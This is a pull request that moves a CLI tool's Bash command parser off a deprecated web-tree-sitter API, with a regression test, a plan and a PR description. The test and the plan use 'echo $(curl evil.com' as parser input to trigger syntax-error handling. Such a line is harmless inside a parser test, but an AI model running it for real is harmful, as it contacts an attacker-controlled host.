### PR TITLE
fix(core): construct tree-sitter queries via new Query to stop deprecation spam

### DIFF
--- a/packages/core/src/utils/shell-parser.deprecation.test.ts
+++ b/packages/core/src/utils/shell-parser.deprecation.test.ts
@@ -1,0 +1,85 @@
+/**
+ * @license
+ * Copyright 2026 Vybestack LLC
+ * SPDX-License-Identifier: Apache-2.0
+ */
+
+import { describe, it, expect, vi, afterEach } from 'bun:test';
+import {
+  initializeParser,
+  getInitializationError,
+  parseShellCommand,
+  parseCommandDetails,
+  extractCommandNames,
+  hasCommandSubstitution,
+} from './shell-parser.js';
+
+const parserInitialized = await initializeParser();
+
+if (!parserInitialized) {
+  // These tests pin the #3436 regression; skipping silently on init failure
+  // would let the warning leak return unnoticed, so fail loudly instead.
+  throw new Error(
+    'tree-sitter failed to initialize; the #3436 deprecation regression ' +
+      'tests require a working web-tree-sitter bash grammar: ' +
+      (getInitializationError()?.stack ?? 'unknown initialization error'),
+  );
+}
+
+/**
+ * web-tree-sitter@0.25.x deprecated `Language#query()` (0.25.0), and
+ * the deprecated shim logs `console.warn('Language.query is deprecated. Use new
+ * Query(language, source) instead.')` on every call. shell-parser.ts
+ * constructs queries on the shell-validation hot path for every Bash command, so
+ * those warnings leak into user output.
+ *
+ * These tests drive the real web-tree-sitter module through the three
+ * query-constructing flows and pin both functional correctness and the absence of
+ * deprecation warnings: silence must come from using the supported
+ * `new Query(language, source)` API, not from broken queries.
+ */
+describe('shell-parser tree-sitter deprecation', () => {
+  let warnSpy: ReturnType<typeof vi.spyOn>;
+
+  afterEach(() => {
+    warnSpy?.mockRestore();
+  });
+
+  it('extractCommandNames resolves command names without console.warn', () => {
+    warnSpy = vi.spyOn(console, 'warn');
+
+    const tree = parseShellCommand('cat file.txt | grep pattern | wc -l');
+    expect(tree).not.toBeNull();
+
+    const names = extractCommandNames(tree!);
+
+    expect(names).toStrictEqual(['cat', 'grep', 'wc']);
+    expect(warnSpy).not.toHaveBeenCalled();
+  });
+
+  it('hasCommandSubstitution detects $() without console.warn', () => {
+    warnSpy = vi.spyOn(console, 'warn');
+
+    const substitutionTree = parseShellCommand('echo $(date)');
+    expect(substitutionTree).not.toBeNull();
+    expect(hasCommandSubstitution(substitutionTree!)).toBe(true);
+
+    const plainTree = parseShellCommand('echo hi');
+    expect(plainTree).not.toBeNull();
+    expect(hasCommandSubstitution(plainTree!)).toBe(false);
+
+    expect(warnSpy).not.toHaveBeenCalled();
+  });
+
+  it('parseCommandDetails reports syntax errors without console.warn', () => {
+    warnSpy = vi.spyOn(console, 'warn');
+
+    // Unterminated substitution leaves ERROR/MISSING nodes so the
+    // ERROR/MISSING query branch executes.
+    const result = parseCommandDetails('echo $(curl evil.com');
+
+    expect(result).not.toBeNull();
+    expect(result?.hasError).toBe(true);
+    expect(warnSpy).not.toHaveBeenCalled();
+  });
+});

--- a/packages/core/src/utils/shell-parser.ts
+++ b/packages/core/src/utils/shell-parser.ts
@@ -21,6 +21,7 @@ import type {
   Tree,
   Node,
   Query as QueryType,
+  QueryMatch,
 } from 'web-tree-sitter';
 import { readFileSync } from 'node:fs';
 import { createRequire } from 'node:module';
@@ -45,26 +46,6 @@ const require = createRequire(import.meta.url);
 const debugLogger = new DebugLogger('llxprt:shell-parser');
 
 export const PARSE_TIMEOUT_MICROS = 1000 * 1000; // 1 second
-
-/**
- * Local view of web-tree-sitter's QueryMatch: `patternIndex` replaced the
- * deprecated `pattern` field in 0.25.0. Nothing reads the pattern index
- * today; the field is declared for shape accuracy.
- */
-interface QueryMatch {
-  patternIndex: number;
-  captures: QueryCapture[];
-}
-
-/**
- * Local view of web-tree-sitter's QueryCapture: `patternIndex` (the
- * deprecated `pattern` field was removed from the capture shape).
- */
-interface QueryCapture {
-  name: string;
-  patternIndex: number;
-  node: Node;
-}
 
 /**
  * Shape of the dynamically imported `web-tree-sitter` module. In 0.25.x the
@@ -535,7 +516,7 @@ export function extractCommandNames(tree: Tree): string[] {
     '(command name: (command_name) @cmd)',
   );
   try {
-    const matches = query.matches(tree.rootNode) as QueryMatch[];
+    const matches = query.matches(tree.rootNode);
 
     for (const match of matches) {
       collectCommandNamesFromCaptures(match.captures, commands);
@@ -762,7 +743,7 @@ export function parseCommandDetails(
               activeBashLanguage,
               '(ERROR) @error (MISSING) @missing',
             );
-            const captures = query.captures(tree.rootNode) as QueryCapture[];
+            const captures = query.captures(tree.rootNode);
             const syntaxErrors = captures.map((capture) => {
               const { node, name } = capture;
               const type = name === 'missing' ? 'Missing' : 'Error';
@@ -806,7 +787,7 @@ function hasParsedCommandSubstitution(tree: Tree): boolean {
   );
 
   try {
-    const matches = query.matches(tree.rootNode) as QueryMatch[];
+    const matches = query.matches(tree.rootNode);
     return matches.length > 0;
   } finally {
     query.delete();

--- a/packages/core/src/utils/shell-parser.ts
+++ b/packages/core/src/utils/shell-parser.ts
@@ -47,6 +47,26 @@ const debugLogger = new DebugLogger('llxprt:shell-parser');
 export const PARSE_TIMEOUT_MICROS = 1000 * 1000; // 1 second
 
 /**
+ * Local view of web-tree-sitter's QueryMatch: `patternIndex` replaced the
+ * deprecated `pattern` field in 0.25.0. Nothing reads the pattern index
+ * today; the field is declared for shape accuracy.
+ */
+interface QueryMatch {
+  patternIndex: number;
+  captures: QueryCapture[];
+}
+
+/**
+ * Local view of web-tree-sitter's QueryCapture: `patternIndex` (the
+ * deprecated `pattern` field was removed from the capture shape).
+ */
+interface QueryCapture {
+  name: string;
+  patternIndex: number;
+  node: Node;
+}
+
+/**
  * Shape of the dynamically imported `web-tree-sitter` module. In 0.25.x the
  * `Parser` and `Language` classes are top-level named exports; some bundler
  * configurations also nest `Parser` under `default`.
@@ -59,13 +79,46 @@ type TreeSitterDefaultExport =
   | {
       Parser?: new () => ParserType;
       Language?: TreeSitterLanguageLoader;
+      Query?: new (language: Language, source: string) => QueryType;
     }
   | (new () => ParserType);
 
 interface TreeSitterModule {
   Parser?: new () => ParserType;
   Language?: TreeSitterLanguageLoader;
+  Query?: new (language: Language, source: string) => QueryType;
   default?: TreeSitterDefaultExport;
+}
+
+function isQueryConstructor(
+  value: unknown,
+): value is new (language: Language, source: string) => QueryType {
+  return typeof value === 'function';
+}
+
+/**
+ * Resolve the tree-sitter Query constructor. web-tree-sitter 0.25.x exports
+ * `Query` as a named export; some bundler configurations also nest it under
+ * `default`.
+ */
+function resolveTreeSitterQuery(
+  named: unknown,
+  defaultExport: unknown,
+): (new (language: Language, source: string) => QueryType) | undefined {
+  if (isQueryConstructor(named)) {
+    return named;
+  }
+  if (
+    typeof defaultExport === 'object' &&
+    defaultExport !== null &&
+    'Query' in defaultExport
+  ) {
+    const nestedQuery = defaultExport.Query;
+    if (isQueryConstructor(nestedQuery)) {
+      return nestedQuery;
+    }
+  }
+  return undefined;
 }
 
 /**
@@ -172,18 +225,6 @@ async function resolvePwshWasmBytes(): Promise<Uint8Array> {
   }
   return new Uint8Array(readFileSync(wasmPath));
 }
-
-// Type definitions for tree-sitter query results
-interface QueryCapture {
-  name: string;
-  node: Node;
-}
-
-interface QueryMatch {
-  pattern: number;
-  captures: QueryCapture[];
-}
-
 /**
  * Identifies which grammar language to use for parsing.
  */
@@ -195,6 +236,17 @@ let pwshParser: ParserType | null = null;
 let pwshLanguage: Language | null = null;
 let initializationPromise: Promise<boolean> | null = null;
 let initializationError: Error | null = null;
+
+/**
+ * Resolved tree-sitter `Query` constructor, published alongside `bashLanguage`
+ * once the winning generation's initialization completes. The deprecated
+ * `Language#query()` shim is what logs the no-once-guard console.warn; all
+ * query construction goes through `new QueryCtor(language, source)` instead.
+ * Guarded exactly like `bashLanguage` at every callsite.
+ */
+let QueryCtor:
+  | (new (language: Language, source: string) => QueryType)
+  | undefined;
 
 /**
  * Monotonic generation counter for race-safe initialization. Each
@@ -269,6 +321,13 @@ async function performParserInitialization(
       );
     }
 
+    const Query = resolveTreeSitterQuery(TreeSitter.Query, TreeSitter.default);
+    if (!Query) {
+      throw new Error(
+        'web-tree-sitter Query export not found; expected top-level or default-nested Query class',
+      );
+    }
+
     // Load the Bash grammar (required for all paths) into local variables.
     const bashWasmBytes = await resolveBashWasmBytes();
     const localBashLanguage = await LanguageLoader.load(bashWasmBytes);
@@ -307,6 +366,7 @@ async function performParserInitialization(
     // Publish resources to module-level state.
     parser = localParser;
     bashLanguage = localBashLanguage;
+    QueryCtor = Query;
     pwshParser = localPwshParser;
     pwshLanguage = localPwshLanguage;
 
@@ -319,6 +379,7 @@ async function performParserInitialization(
         error instanceof Error ? error : new Error(String(error));
       parser = pwshParser = null;
       bashLanguage = pwshLanguage = null;
+      QueryCtor = undefined;
     }
     return false;
   }
@@ -462,14 +523,17 @@ export function hasCommandSubstitutionForLanguage(
  * This handles pipelines, command lists (&&, ||, ;), and subshells.
  */
 export function extractCommandNames(tree: Tree): string[] {
-  if (!bashLanguage) {
+  if (!bashLanguage || !QueryCtor) {
     return [];
   }
 
   const commands: string[] = [];
 
   // Query for command_name nodes which are the actual command being executed
-  const query = bashLanguage.query('(command name: (command_name) @cmd)');
+  const query = new QueryCtor(
+    bashLanguage,
+    '(command name: (command_name) @cmd)',
+  );
   try {
     const matches = query.matches(tree.rootNode) as QueryMatch[];
 
@@ -668,10 +732,11 @@ function hasPromptTransformInExpansion(node: Node): boolean {
 export function parseCommandDetails(
   command: string,
 ): CommandParseResult | null {
-  if (!parser || !bashLanguage) {
+  if (!parser || !bashLanguage || !QueryCtor) {
     return null;
   }
   const activeBashLanguage = bashLanguage;
+  const ActiveQuery = QueryCtor;
 
   try {
     return (
@@ -693,7 +758,8 @@ export function parseCommandDetails(
         if (hasError) {
           let query: QueryType | null = null;
           try {
-            query = activeBashLanguage.query(
+            query = new ActiveQuery(
+              activeBashLanguage,
               '(ERROR) @error (MISSING) @missing',
             );
             const captures = query.captures(tree.rootNode) as QueryCapture[];
@@ -725,16 +791,19 @@ export function parseCommandDetails(
 }
 
 function hasParsedCommandSubstitution(tree: Tree): boolean {
-  if (!bashLanguage) {
+  if (!bashLanguage || !QueryCtor) {
     return false;
   }
 
-  const query = bashLanguage.query(`
+  const query = new QueryCtor(
+    bashLanguage,
+    `
     [
       (command_substitution) @sub
       (process_substitution) @proc
     ]
-  `);
+  `,
+  );
 
   try {
     const matches = query.matches(tree.rootNode) as QueryMatch[];
@@ -841,6 +910,7 @@ export function resetParser(): void {
   pwshParser = null;
   bashLanguage = null;
   pwshLanguage = null;
+  QueryCtor = undefined;
   initializationPromise = initializationError = null;
 }
 

--- a/project-plans/issue3436/plan.md
+++ b/project-plans/issue3436/plan.md
@@ -1,0 +1,136 @@
+# Plan: Migrate shell-parser off deprecated web-tree-sitter Language.query() (Issue #3436)
+
+Plan ID: PLAN-20260830-TSQRY
+Generated: 2026-08-30
+Issue: https://github.com/vybestack/llxprt-code/issues/3436
+Total Phases: 3 (RED test, GREEN implementation, verification)
+
+## Problem
+
+`web-tree-sitter@0.25.x` deprecated `Language#query()` in 0.25.0. Every call
+runs `console.warn('Language.query is deprecated. Use new Query(language, source) instead.')`
+with no once-guard. `packages/core/src/utils/shell-parser.ts` calls the
+deprecated method at three sites, all on the shell-validation hot path, so two
+or more warning lines leak into user output per validated Bash command
+(interactive: Ink console stream; non-interactive text: stderr via
+ConsolePatcher).
+
+## Preflight Verification (Phase 0.5, completed 2026-08-30)
+
+| Item | Expected | Actual | Match |
+|------|----------|--------|-------|
+| web-tree-sitter version | 0.25.x with deprecated `Language.query` | `^0.25.10` in packages/core/package.json; shim in node_modules/web-tree-sitter/src/language.ts logs console.warn every call | YES |
+| Deprecated callsites | Unknown | 3 sites, all in packages/core/src/utils/shell-parser.ts: `extractCommandNames` (~L472), `parseCommandDetails` ERROR query (~L696), `hasParsedCommandSubstitution` (~L732) | YES |
+| Replacement API | Exported `Query` constructor | `new Query(language, source)` is a named export in both ESM (tree-sitter.js) and CJS (tree-sitter.cjs) builds; `QueryType` already imported as type in shell-parser.ts | YES |
+| Export shape variance | Bundlers may nest exports under `default` | Existing code resolves `Parser` and `Language` through named/default-nested candidates; `Query` needs the same treatment | YES |
+| Real-module tests feasible | Existing tests use real web-tree-sitter | shell-parser.test.ts loads the real bash WASM grammar via `initializeParser()`; no process-wide mock on the paths we extend | YES |
+| Other deprecated web-tree-sitter usage | Audit | We do not call `Parser.timeoutMicros` (we pass `progressCallback`) or read `Language.version`. Local `QueryMatch` interface still declares deprecated `pattern` field; we only read `captures` | YES |
+
+Blocking issues: none.
+
+## Requirements
+
+### REQ-3436-01: Shell validation emits zero console.warn from tree-sitter usage
+
+- GIVEN: the parser is initialized with the real web-tree-sitter module
+- WHEN: shell validation runs for a plain command, a command substitution
+  command, and a syntax-error command (the three paths that construct queries)
+- THEN: `console.warn` is not called (spy observes zero calls during those
+  flows), AND the functional results remain correct (command names extracted,
+  substitution detected, syntax error reported) so silence cannot come from
+  broken queries.
+
+### REQ-3436-02: Queries are constructed with the supported `new Query(language, source)` API
+
+- GIVEN: `performParserInitialization()` successfully imports web-tree-sitter
+- WHEN: the module's exports are resolved
+- THEN: the `Query` constructor is resolved with the same named/default-nested
+  candidate treatment as `Parser` and `Language`, stored in module state
+  alongside `bashLanguage`, published only on the winning generation, and
+  cleared by `resetParser()`. If the export cannot be resolved, initialization
+  fails fast with an error naming the missing export (mirrors the Language
+  export failure). All three callsites construct via the resolved constructor;
+  per-call `delete()` in `finally` is preserved (the deprecated shim was
+  exactly `return new Query(this, source)` minus the warning, so lifecycle is
+  unchanged).
+
+### REQ-3436-03: Local query result types use the current web-tree-sitter shape
+
+- GIVEN: shell-parser.ts declares local `QueryMatch`/`QueryCapture` interfaces
+- WHEN: the deprecated `pattern` field (deprecated in favor of `patternIndex`
+  since 0.25.0) is encountered
+- THEN: the local interfaces are updated to the current shape (`patternIndex`,
+  not `pattern`); no code reads the deprecated field (already true).
+
+## Phases
+
+### Phase 01 (RED): behavioral test proving the leak and pinning behavior
+
+Create `packages/core/src/utils/shell-parser.deprecation.test.ts`:
+
+- Initialize the real parser (`initializeParser()`), skip honestly if the
+  grammar cannot load (follow shell-parser.test.ts conventions).
+- Spy `console.warn` (infrastructure observation, allowed) via
+  `vi.spyOn(console, 'warn')`, restoring in afterEach.
+- Drive the three query-constructing flows with the real module:
+  - `extractCommandNames(tree)` on a parsed multi-command string; assert the
+    expected command names (functional pin).
+  - `hasCommandSubstitution(tree)` on `echo $(date)`; assert true (functional
+    pin), and on `echo hi`; assert false.
+  - `parseCommandDetails('echo $(curl evil.com')` (unterminated substitution
+    forces `hasError` true so the ERROR/MISSING query runs); assert
+    `hasError === true` (functional pin).
+- Assert `console.warn` was NOT called during these flows (this is the line
+  that fails on main and passes after the fix).
+- No mocking of web-tree-sitter or shell-parser internals (no mock theater;
+  the component under test is real).
+
+### Phase 02 (GREEN): migrate the three callsites
+
+Modify `packages/core/src/utils/shell-parser.ts`:
+
+- Extend `TreeSitterModule`/`TreeSitterDefaultExport` with
+  `Query?: new (language: Language, source: string) => QueryType`.
+- Add `resolveTreeSitterQuery` mirroring the existing resolver style
+  (function-shaped named export, else default-nested, else fail fast).
+- Add module state `QueryCtor`, published in `performParserInitialization()`
+  on the winning generation, cleared in `resetParser()`; guards in the three
+  query functions treat a missing constructor exactly like a missing language.
+- Replace the three `bashLanguage.query(source)` /
+  `activeBashLanguage.query(source)` calls with construction via the resolved
+  constructor. Keep per-call `query.delete()` in `finally` blocks.
+- Update local `QueryMatch` (and `QueryCapture` for shape accuracy) to the
+  current web-tree-sitter result shape (`patternIndex`).
+
+### Phase 03: verification
+
+- `bun test packages/core/src/utils/shell-parser.deprecation.test.ts` (target)
+- Full cycle per the issue workflow:
+  `npm run test`, `npm run lint`, `npm run typecheck`, `npm run format`,
+  `npm run build`, and the stepfun-37 smoke test via
+  `bun scripts/start.ts --profile-load stepfun-37 "write me a haiku and nothing else"`.
+- Test-audit scanner diff vs main for files touched
+  (`bun scripts/test-audit/scan.ts` baseline compare; no new findings).
+- `grep -rn "\.query(" packages/core/src packages/tools/src packages/cli/src`
+  restricted to tree-sitter language receivers must return no first-party
+  callsites (plan docs under project-plans/ are historical records).
+
+## Out of scope
+
+- Issue #3437 (AnthropicOAuthProvider TokenStore shim) is a separate effort.
+- Query object caching per language (queries are constructed per call today;
+  switching to cached query objects changes lifetime semantics and is not
+  needed to stop the warnings).
+- ConsolePatcher routing policy (the patcher did its job; the defect was
+  calling a deprecated API that warns on every use).
+
+## Failure Recovery
+
+1. `git checkout -- packages/core/src/utils/shell-parser.ts`
+2. `git checkout -- packages/core/src/utils/shell-parser.deprecation.test.ts`
+3. Re-run Phase 01 to confirm the leak reproduces on main.
+
+## Success Criteria
+
+- REQ-3436-01/02/03 satisfied; verification cycle green; no deprecated
+  `Language.query` callsites remain in first-party source.


### PR DESCRIPTION
## TLDR

The CLI leaked the third-party warning `Language.query is deprecated. Use new Query(language, source) instead.` into user-visible output, twice per validated Bash command (red in the TUI, stderr in non-interactive text mode; JSON output dropped it). web-tree-sitter 0.25.x deprecated `Language#query()` and `console.warn`s on every call with no once-guard. Instead of living on a deprecated API, this PR rip/replace migrates all three callsites in `packages/core/src/utils/shell-parser.ts` to the supported `new Query(language, source)` constructor. Fixes #3436.

## Dive Deeper

- Root cause: `web-tree-sitter@0.25.10`'s `Language#query()` shim logs a deprecation warning on every invocation. Our shell command validator constructs queries at three sites (`extractCommandNames`, the ERROR/MISSING diagnostics branch of `parseCommandDetails`, `hasParsedCommandSubstitution`), all on the per-command validation hot path, so every shell tool call surfaced the warning. The leak path is `ConsolePatcher` (console.warn to Ink messages or stderr), which is why it appeared as red output.
- Fix shape: the `Query` constructor is resolved at parser initialization alongside `Parser` and `Language`, using the same export-shape tolerance (named export, default-nested, fail fast when absent). It is published into the generation-guarded module state (respects `resetParser()` races per #3181) and cleared on every reset/error path. All three callsites construct via `new Query(...)`; per-call `query.delete()` disposal in `finally` is preserved, and `parseCommandDetails` captures the constructor into a local so TypeScript narrowing holds across the `withParsedTree` closure.
- No behavior change: queries, capture iteration, and results are identical; the local `QueryMatch`/`QueryCapture` views now declare `patternIndex` (the deprecated `pattern` field is gone).
- Regression test (`shell-parser.deprecation.test.ts`) drives the real web-tree-sitter module through all three query-constructing flows and pins both functional results and zero `console.warn`. It fails loudly if parser initialization breaks, so the pin cannot silently lose coverage.
- Verification: full cycle green (`npm run test`, `lint`, `typecheck`, `format`, `build`), smoke run with the stepfun-37 profile clean with zero deprecation mentions, test-audit scanner shows no new findings vs main, agents API-surface guard passes unchanged. One `npm run typecheck` failure seen locally (missing `github-ops` exports) was proven identical on clean main and caused by stale workspace dist after main's latest commit; rebuilding the tools workspace resolved it.
- Out of scope, tracked separately: #3437 (dead `TokenStore` deprecation shim in `AnthropicOAuthProvider`).

## Reviewer Test Plan

1. `cd packages/core && bun test src/utils/shell-parser.deprecation.test.ts` — 3 pass, 0 fail, no deprecation output.
2. `git stash` the fix (keep the test) and re-run: the same suite fails with `console.warn` called twice, reproducing the leak.
3. `bun scripts/start.ts --profile-load stepfun-37 "run: echo hi"` (or any prompt that triggers shell validation) and confirm no `Language.query is deprecated` lines anywhere in stdout/stderr.
4. `cd packages/agents && bun ../../scripts/check-agents-api-surface.ts` — surface unchanged.

## Testing Matrix

|          | 🍏  | 🪟  | 🐧  |
| -------- | --- | --- | --- |
| npm run  | ✅  | ❓  | ❓  |
| npx      | ❓  | ❓  | ❓  |
| Docker   | ❓  | ❓  | ❓  |
| Podman   | ❓  | -   | -   |
| Seatbelt | ❓  | -   | -   |

## Linked issues / bugs

Fixes #3436
Related to #3437 (separate follow-up, not addressed here)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Bug Fixes**
  * Improved shell command parsing reliability and compatibility with updated parsing technology.
  * Improved detection of Bash commands, syntax errors, and command substitutions.
  * Added safer handling when parsing functionality is unavailable.
  * Prevented deprecation warnings during shell parsing operations.

* **Tests**
  * Added regression coverage to verify shell parsing works correctly without deprecation warnings.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->